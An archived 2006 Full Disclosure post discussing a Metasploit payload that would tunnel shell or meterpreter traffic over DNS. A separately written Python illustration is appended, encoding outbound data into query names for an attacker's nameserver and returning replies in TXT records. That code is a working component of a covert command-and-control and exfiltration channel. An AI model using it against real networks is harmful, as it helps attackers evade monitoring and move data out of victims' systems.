Full Disclosure mailing list archives

Re: JavaScript get Internal Address (thanks to DanBUK)
From: Alexander Sotirov <asotirov () determina com>
Date: Mon, 14 Aug 2006 00:50:05 -0700

H D Moore wrote:
> 1) Create a metasploit payload for communicating with shell/meterpreter
> via DNS queries and replies. This will not be a 'small' payload by any
> means, but should be feasible for all DCERPC and browser bug exploits.
>
> 2) Develop a custom DNS server for *.msf.metasploit.com
>
> 3) Provide a registration page where you can request a username/password
>
> How about a custom DNS server that takes queries like
> *. and returns a SOA that points to the IP
> address? This will force the client to contact the name server at
> directly, avoiding the need for registration.
>
> The problems with this are:
>
> * Privacy concerns regarding the initial DNS request to msf.metasploit.com
> for the NS record of the attacker. Technically, this could violate an NDA
> if used on a penetration test.

The domain name in the payload will be configurable, so you can set it to
myowndomain.com instead of msf.metasploit.com. If you are a pentester, you can
probably afford to run your own nameserver.

> * The framework console would need to bind to port 53 (r00t on unix) and
> be accessible from the internet.

The same is true for all browser exploits in the framework.

> * It may not be that useful, but it does seem like a fun hack. With any
> luck, this can be accomplished using the built-in name resolution API in

I think DNSAPI.DLL has all the functionality you need for the payload. Look at
WinDNS.h in the Platform SDK, specifically the DnsQuery() function. I just spent
an entire weekend reversing this dll, so I know it pretty well by now :-)


Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
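The thread sketches the mechanism but shows no code, so here is an added, offline illustration of the exchange being discussed: the client packs each chunk of outbound data into a query name under a configurable tunnel domain, the attacker's own nameserver (the thing that has to listen on port 53) decodes it and answers with a TXT record, and the client pulls the reply back out. This is not code from Sotirov, H D Moore or the Metasploit Framework; the domain msf.example.com, the chunk size, the base32 label encoding and the use of TXT records are my own assumptions, and the client side is written in Python rather than against DnsQuery() so it runs anywhere.

```python
import base64
import struct

# Hypothetical tunnel domain: the thread says the payload's domain is configurable,
# so the attacker's own zone is used instead of msf.metasploit.com.
TUNNEL_DOMAIN = "msf.example.com"
MAX_CHUNK = 30          # 30 bytes -> 48 base32 chars, under the 63-octet label limit
TYPE_TXT = 16
CLASS_IN = 1


def encode_chunk(seq, data, domain=TUNNEL_DOMAIN):
    """Client side: pack one chunk of outbound data into a name under the tunnel domain.
    base32 is used because DNS names are case-insensitive and resolvers may flip case."""
    if len(data) > MAX_CHUNK:
        raise ValueError("chunk too large for one label")
    label = base64.b32encode(data).decode("ascii").rstrip("=").lower()
    return "%s.%d.%s" % (label, seq, domain)


def decode_name(qname, domain=TUNNEL_DOMAIN):
    """Server side: recover (seq, data) from a query name, or None if it is not ours."""
    suffix = "." + domain.lower()
    qname = qname.lower()
    if not qname.endswith(suffix):
        return None
    parts = qname[:-len(suffix)].split(".")
    if len(parts) != 2 or not parts[1].isdigit():
        return None
    label, seq = parts
    padded = label.upper() + "=" * (-len(label) % 8)   # restore the '=' padding DNS cannot carry
    return int(seq), base64.b32decode(padded)


def encode_qname(name):
    out = b""
    for part in name.split("."):
        out += bytes([len(part)]) + part.encode("ascii")
    return out + b"\x00"


def decode_qname(packet, offset):
    labels = []
    while True:
        length = packet[offset]
        offset += 1
        if length == 0:
            return ".".join(labels), offset
        labels.append(packet[offset:offset + length].decode("ascii"))
        offset += length


def build_query(txid, qname):
    # Header: ID, flags (RD set), QDCOUNT=1, ANCOUNT=NSCOUNT=ARCOUNT=0
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_qname(qname) + struct.pack("!HH", TYPE_TXT, CLASS_IN)


def parse_query(packet):
    txid = struct.unpack("!H", packet[:2])[0]
    qname, off = decode_qname(packet, 12)
    qtype, _qclass = struct.unpack("!HH", packet[off:off + 4])
    return txid, qname, qtype


def build_txt_response(query, txt):
    """Server side: answer the query with one TXT record carrying `txt` (<=255 bytes).
    TTL 0 keeps recursive resolvers from caching the reply, which would otherwise
    hand a stale answer back to the next identically named chunk."""
    if len(txt) > 255:
        raise ValueError("TXT character-string limited to 255 bytes")
    txid, qname, _ = parse_query(query)
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)  # QR, RD, RA, NOERROR; one answer
    question = encode_qname(qname) + struct.pack("!HH", TYPE_TXT, CLASS_IN)
    rdata = bytes([len(txt)]) + txt
    # 0xC00C is a compression pointer back to the question name at offset 12.
    answer = b"\xc0\x0c" + struct.pack("!HHIH", TYPE_TXT, CLASS_IN, 0, len(rdata)) + rdata
    return header + question + answer


def parse_txt_response(packet):
    """Client side: pull the TXT payload out of the first answer record."""
    _, off = decode_qname(packet, 12)
    off += 4 + 2            # skip qtype/qclass and the 2-byte name pointer of the answer
    _rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", packet[off:off + 10])
    off += 10
    rdata = packet[off:off + rdlen]
    return rdata[1:1 + rdata[0]]


def tunnel_exchange(outbound, server_reply, domain=TUNNEL_DOMAIN):
    """Simulate the exchange offline: the client splits `outbound` into per-query
    chunks, the server reassembles them and answers each query with `server_reply`.
    Returns (what the server reassembled, list of replies the client decoded)."""
    received = {}
    replies = []
    chunks = [outbound[i:i + MAX_CHUNK] for i in range(0, len(outbound), MAX_CHUNK)]
    for seq, chunk in enumerate(chunks):
        query = build_query(0x1000 + seq, encode_chunk(seq, chunk, domain))
        # --- what the server's UDP/53 handler would do with the datagram ---
        _txid, qname, qtype = parse_query(query)
        decoded = decode_name(qname, domain)
        if qtype != TYPE_TXT or decoded is None:
            continue                      # not tunnel traffic; a real server would NXDOMAIN it
        s, data = decoded
        received[s] = data
        response = build_txt_response(query, server_reply)
        # --- back on the client ---
        replies.append(parse_txt_response(response))
    reassembled = b"".join(received[s] for s in sorted(received))
    return reassembled, replies
```

The sequence number sits in its own label so the server can reorder chunks that arrive out of order, and the zero TTL matters because the request normally travels through the target's recursive resolver rather than straight to port 53 on the attacker's host. On a Windows client the equivalent of build_query/parse_txt_response is a DnsQuery() call with type DNS_TYPE_TEXT and the DNS_QUERY_BYPASS_CACHE option, so that the local resolver cache does not short-circuit repeated names either.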
